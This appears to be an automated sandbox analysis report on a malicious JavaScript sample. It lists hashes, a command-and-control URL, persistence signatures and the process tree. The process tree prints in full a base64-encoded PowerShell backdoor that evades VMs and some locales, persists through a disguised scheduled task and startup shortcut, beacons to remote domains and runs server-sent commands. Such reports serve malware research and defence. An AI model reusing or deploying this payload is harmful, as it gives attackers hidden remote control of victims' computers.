Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
13-05-2024 08:40
Static task
static1
Behavioral task
behavioral1
Sample
3e9c6a8e6988adbb16ef8715c22cdd58_JaffaCakes118.js
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
3e9c6a8e6988adbb16ef8715c22cdd58_JaffaCakes118.js
Resource
win10v2004-20240508-en
General
-
Target
3e9c6a8e6988adbb16ef8715c22cdd58_JaffaCakes118.js
-
Size
20KB
-
MD5
3e9c6a8e6988adbb16ef8715c22cdd58
-
SHA1
c959d76d0cbe839ed6325796b1b92e2a62f5e5a2
-
SHA256
4f84400506a99ee8b0b7d0ea00fd66d5cb575e8bf768fc6bcdbee5592e310fca
-
SHA512
1a688465a5161ba5e49db747b07ecffd3f6d42abaa4befd3eaa02755e2bf34c90a8dcf0ecb4054a270507706cdd86b17ed6bf1763406434588fab35c11e0aeb7
-
SSDEEP
384:3wjKMDdC+3HjH1ciPOlHS4mLasODgZjNfqLhIdlWmpzOTkmIhkn73jbIYmYTc:3mKCDVu+msdFDdlfpzUkmRfbIh
Malware Config
Extracted
http://wws.chasingredford.com/
Signatures
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsIndexingService.lnk powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2856 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3000 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1008 wrote to memory of 3000 1008 wscript.exe 28 PID 1008 wrote to memory of 3000 1008 wscript.exe 28 PID 1008 wrote to memory of 3000 1008 wscript.exe 28 PID 3000 wrote to memory of 2584 3000 powershell.exe 31 PID 3000 wrote to memory of 2584 3000 powershell.exe 31 PID 3000 wrote to memory of 2584 3000 powershell.exe 31 PID 3000 wrote to memory of 2500 3000 powershell.exe 32 PID 3000 wrote to memory of 2500 3000 powershell.exe 32 PID 3000 wrote to memory of 2500 3000 powershell.exe 32 PID 3000 wrote to memory of 2856 3000 powershell.exe 33 PID 3000 wrote to memory of 2856 3000 powershell.exe 33 PID 3000 wrote to memory of 2856 3000 powershell.exe 33 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\3e9c6a8e6988adbb16ef8715c22cdd58_JaffaCakes118.js1⤵
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'aWYoKChHZXQtVUlDdWx0dXJlKS5OYW1lIC1tYXRjaCAiQ058Uk98UlV8VUF8QlkiKSAtb3IgKChHZXQtV21pT2JqZWN0IC1jbGFzcyBXaW4zMl9Db21wdXRlclN5c3RlbSAtUHJvcGVydHkgTW9kZWwpLk1vZGVsIC1tYXRjaCAiVmlydHVhbEJveHxWTXdhcmV8S1ZNIikpeyBleGl0O307CiR2Y2Z4YmFhZnhnID0gJXdvcmtfZGlyJTsKaWYgKC1ub3QgKFRlc3QtUGF0aCAkdmNmeGJhYWZ4ZykpIHsgbWQgJHZjZnhiYWFmeGc7IH0KJGJ2ZHlhdWYgPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzXFdpbmRvd3NJbmRleGluZ1NlcnZpY2UuanMiOwokYWV3ZGdjdnMgPSAkZW52OnRlbXAgKyAiXFhBRlg5MTEuMS50bXAiOwokaGN1ZWl2YnhkICA9IEpvaW4tUGF0aCAkdmNmeGJhYWZ4ZyAidGh1bWJjYWNoZV8zMy5kYiI7CiRkaXRqYnpoZXYgID0gOTExLjE7CiRteXVybHBvc3QgPSAkZmFsc2U7CiRkYnl2YWlqID0gInciOwoKZnVuY3Rpb24gaWFtd29ya3sgc2MgLVBhdGggJGFld2RnY3ZzIC1WYWx1ZSAoICRwaWQsIFtzdHJpbmddKEdldC1EYXRlKSwgJGRpdGpiemhldiwgJG15dXJscG9zdCwgJGVzenl1emNlIC1qb2luICcsJyApOyB9OwpmdW5jdGlvbiBkY2d1dmV3aSggJGd4Y3lnZHVpdmUgKXsKICBpZiggJGd4Y3lnZHVpdmUgLW1hdGNoICdPdXRPZk1lbW9yeUV4Y2VwdGlvbicgKXsKICAgIHJpIC1QYXRoICRhZXdkZ2N2cyAtRm9yY2U7CiAgICBnZXQtcHJvY2VzcyBwb3dlcnNoZWxsKiB8IHN0b3AtcHJvY2VzczsKICAgIGV4aXQ7CiAgfTsKfQoKZnVuY3Rpb24gc2VuZHBvc3QoICRneGN5Z2R1aXZlICl7CiAgaWYoICEkbXl1cmxwb3N0ICl7IHJldHVybiAkZmFsc2U7IH07CiAgJGN6aWRhaWNoID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsKICAkY3ppZGFpY2guQ3JlZGVudGlhbHMgPSBbU3lzdGVtLk5ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7CiAgJGN6aWRhaWNoLkhlYWRlcnMuQWRkKCJDb250ZW50LVR5cGUiLCAiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIik7CiAgJGN6aWRhaWNoLkVuY29kaW5nID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGODsKICB0cnl7CiAgICAkemRjaGV4enh4YiA9ICRjemlkYWljaC5VcGxvYWRTdHJpbmcoICRteXVybHBvc3QsICJsPSIrW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoICggInY9JGRpdGpiemhldiZndWlkPSRkanp6d3p2dmJpJiIgKyAkZ3hjeWdkdWl2ZSApICkgKSApOwogICAgJHpkY2hleHp4eGIgPSBbc3RyaW5nXVtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCAkemRjaGV4enh4YiApICk7CiAgICBpZiggISRkYnl2YWlqICl7IHJldHVybiAkZmFsc2U7IH0KICAgIGlmKCAkZXN6eXV6Y2UgLWVxICR6ZGNoZXh6eHhiLlN1YnN0cmluZygwLDE2KSApewogICAgICByZXR1cm4gJHpkY2hleHp4eGIuU3Vic3RyaW5nKDE2LCR6ZGNoZXh6eHhiLmxlbmd0aC0xNikgOwogICAgfWVsc2V7CiAgICAgICRkYnl2YWlqID0gJGZhbHNlOwogICAgICBzZW5kcG9zdCAoImVycm9yPSIgKyBbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcyggJHpkY2hleHp4eGIgKSApICk7CiAgICB9CiAgfWNhdGNoewogICAgZGNndXZld2kgJF8uRXhjZXB0aW9uLk1lc3NhZ2U7CiAgICAkZGJ5dmFpaiA9ICRmYWxzZTsKICAgICRjemlkYWljaC5VcGxvYWRTdHJpbmcoICRteXVybHBvc3QsICJsPSIrW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoICggInY9JGRpdGpiemhldiZndWlkPSRkanp6d3p2dmJpJmVycm9yPXNlbmRwb3N0OiIgKyAkbXl1cmxwb3N0KyI6IiskemRjaGV4enh4YiArIjoiKyAkXy5FeGNlcHRpb24uTWVzc2FnZSApICkgKSApOwogIH07CiAgcmV0dXJuICRmYWxzZTsKfTsKCmZ1bmN0aW9uIGpjeWNnanUoICRneGN5Z2R1aXZlICl7CiAgJGNod2R2aXVmYSA9ICJodHRwOi8vd3dzLmNoYXNpbmdyZWRmb3JkLmNvbS8iOwogICJkZmIiLCI5M2EiLCIyNWMiLCI4ZjkiLCJnaDciIHwgJXsgJGNod2R2aXVmYSArPSAiLCIrImh0dHA6Ly8iKyAoIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoIFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoICRfKyAkKEdldC1EYXRlIC1VRm9ybWF0ICIleSVtJVYiKSApICkudG9Mb3dlcigpICkgKyIudG9wLyI7IH07CiAgJGNod2R2aXVmYS5zcGxpdCgiLCIpIHwgJXsKICAgIGlmKCAhJG15dXJscG9zdCApewogICAgICAkbXl1cmxwb3N0ID0gJF87CiAgICAgIGlmKCAhKHNlbmRwb3N0ICgkZ3hjeWdkdWl2ZSArICImZG9tZW49JG15dXJscG9zdCIgKSkgKXsgJG15dXJscG9zdCA9ICRmYWxzZTsgfTsKICAgICAgU3RhcnQtU2xlZXAgLXMgNTsKICAgIH0KICB9OwogIHJldHVybiAkbXl1cmxwb3N0Owp9OwoKaWYgKCBUZXN0LVBhdGggJGFld2RnY3ZzICl7CiAgaWYgKCAoICggTkVXLVRJTUVTUEFOIC1TdGFydCAoKEdldC1DaGlsZEl0ZW0gJGFld2RnY3ZzICkuQ3JlYXRpb25UaW1lKSAtRW5kIChHZXQtRGF0ZSkpLk1pbnV0ZXMgKSAtZ3QgMTUgKXsKICAgIHRyeXsgc3RvcC1wcm9jZXNzIC1pZCAoIChnYyAkYWV3ZGdjdnMpLnNwbGl0KCIsIilbMF0gKTsgfWNhdGNoe307CiAgICB0cnl7IHJpIC1QYXRoICRhZXdkZ2N2cyAtRm9yY2U7IH1jYXRjaHt9OwogIH1lbHNlewogICAgZXhpdDsKICB9Owp9OwoKJGhjdHhlZHRkdXkgPSAib3M9Iitbc3RyaW5nXSRQU1ZlcnNpb25UYWJsZS5CdWlsZFZlcnNpb24rIiZwc3Zlcj0iKyggKEdldC1Ib3N0KS5WZXJzaW9uICkuTWFqb3I7CmlmICggVGVzdC1QYXRoICRoY3VlaXZieGQgKXsKICAkZGp6end6dnZiaSwgJGVzenl1emNlID0gKGdldC1jb250ZW50ICRoY3VlaXZieGQpLnNwbGl0KCcsJyk7CiAgaWYoICggJGVzenl1emNlLmxlbmd0aCAtbmUgMTYgKSAtb3IgKCAkZGp6end6dnZiaS5sZW5ndGggLWx0IDIxICkgKXsKICAgIHJpIC1QYXRoICRoY3VlaXZieGQsJGFld2RnY3ZzIC1Gb3JjZTsKICAgIHRyeXsgZ2V0LXByb2Nlc3MgcG93ZXJzaGVsbCogfCBzdG9wLXByb2Nlc3MgfWNhdGNoe307CiAgICBleGl0OwogIH0KfWVsc2V7CiAgJGVzenl1emNlID0gKCBbZ3VpZF06Ok5ld0d1aWQoKSAtcmVwbGFjZSAnLScsJycgKS5TdWJzdHJpbmcoMCwxNik7CiAgc2MgLVBhdGggJGhjdWVpdmJ4ZCAtVmFsdWUgKCAoIChHZXQtV21pT2JqZWN0IC1jbGFzcyBXaW4zMl9Db21wdXRlclN5c3RlbSAtUHJvcGVydHkgTmFtZSkuTmFtZS50cmltKCkgKyAiXyIgKyBbZ3VpZF06Ok5ld0d1aWQoKS50b1N0cmluZygpLnJlcGxhY2UoJy0nLCAnJykuU3Vic3RyaW5nKDAsMjApICksICRlc3p5dXpjZSAgLWpvaW4gJywnICk7CiAgZ2kgJGhjdWVpdmJ4ZCAtRm9yY2UgfCAgJXsgJF8uQXR0cmlidXRlcyA9ICJIaWRkZW4iIH07CiAgJGRqenp3enZ2YmksICRlc3p5dXpjZSA9IChnZXQtY29udGVudCAkaGN1ZWl2YnhkKS50cmltKCkuc3BsaXQoJywnKTsKICAkaGN0eGVkdGR1eSArPSAiJnNzaWQ9JGVzenl1emNlJiI7Cn0KdHJ5eyAKICB0cnl7IHNjaHRhc2tzLmV4ZSAvZGVsZXRlIC9UTiAiV2luZG93c0luZGV4aW5nU2VydmljZSIgL2YgfWNhdGNoe30KICB0cnl7IHNjaHRhc2tzLmV4ZSAvZGVsZXRlIC9UTiAiV2luZG93cyBJbmRleGluZyBTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICR0d2JqZ3V5d2ogPSAnd3NjcmlwdC5leGUgLy9ub2xvZ28gIicrJGJ2ZHlhdWYrJyIgPk5VTCAyPiYxJzsKICBzY2h0YXNrcy5leGUgL2NyZWF0ZSAvVE4gIldpbmRvd3NJbmRleGluZ1NlcnZpY2UiIC9zYyBEQUlMWSAvc3QgMDA6MDAgL2YgL1JJIDEwIC9kdSAyMzo1OSAvVFIgJHR3YmpndXl3ajsgCn1jYXRjaHt9OwoKdHJ5ewogICRqaHpjdmZ0ancgPSBbRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdTdGFydHVwJykgKyAnXFdpbmRvd3NJbmRleGluZ1NlcnZpY2UubG5rJzsKICBpZiggLW5vdCAoIFRlc3QtUGF0aCAkamh6Y3ZmdGp3ICkgKXsKICAgICRodWFqdWR4eGdmID0gTmV3LU9iamVjdCAtQ29tT2JqZWN0ICgnV1NjcmlwdC5TaGVsbCcpOwogICAgJGh4eXl5aXcgPSAkaHVhanVkeHhnZi5DcmVhdGVTaG9ydGN1dCggJGpoemN2ZnRqdyAgKTsKICAgICRoeHl5eWl3LkFyZ3VtZW50cz0gJy8vbm9sb2dvICInKyRidmR5YXVmKyciID5OVUwgMj4mMSc7CiAgICAkaHh5eXlpdy5UYXJnZXRQYXRoID0gJ3dzY3JpcHQuZXhlJzsKICAgICRoeHl5eWl3LldvcmtpbmdEaXJlY3RvcnkgPSAkdmNmeGJhYWZ4ZzsKICAgICRoeHl5eWl3LldpbmRvd1N0eWxlID0gMTsKICAgICRoeHl5eWl3LkRlc2NyaXB0aW9uID0gJ1dpbmRvd3MgSW5kZXhpbmcgU2VydmljZSc7CiAgICAkaHh5eXlpdy5TYXZlKCk7CiAgfQp9Y2F0Y2h7fTsKCiRteXVybHBvc3QgPSBqY3ljZ2p1ICRoY3R4ZWR0ZHV5Owp3aGlsZSggJGRieXZhaWogKXsKICBpYW13b3JrOwogIHRyeXsKICAgIGlmKCAkZGJ5dmFpaiAtYW5kICgkZGJ5dmFpai5sZW5ndGggLWd0IDMwKSAgKXsKICAgICAgaWV4IC1Db21tYW5kICRkYnl2YWlqOwogICAgfTsKICB9Y2F0Y2h7CiAgICBkY2d1dmV3aSAkXy5FeGNlcHRpb24uTWVzc2FnZTsKICAgIHNlbmRwb3N0ICgiZXJyb3I9aWV4OiIgKyAkZGJ5dmFpaiArIjoiKyAkbXl1cmxwb3N0ICsiOiIgKyAkXy5FeGNlcHRpb24uTWVzc2FnZSApOwogIH07CiAgU3RhcnQtU2xlZXAgLXMgMjgwOwogICRkYnl2YWlqID0gc2VuZHBvc3QgIiI7Cn07CnJpIC1QYXRoICRhZXdkZ2N2cyAtRm9yY2U7Cg==' ) );iex $a;2⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /TN WindowsIndexingService /f3⤵PID:2584
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /TN "Windows Indexing Service" /f3⤵PID:2500
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /TN WindowsIndexingService /sc DAILY /st 00:00 /f /RI 10 /du 23:59 /TR "wscript.exe //nologo "C:\Users\Public\Libraries\WindowsIndexingService.js" >NUL 2>&1"3⤵
- Creates scheduled task(s)
PID:2856
-
-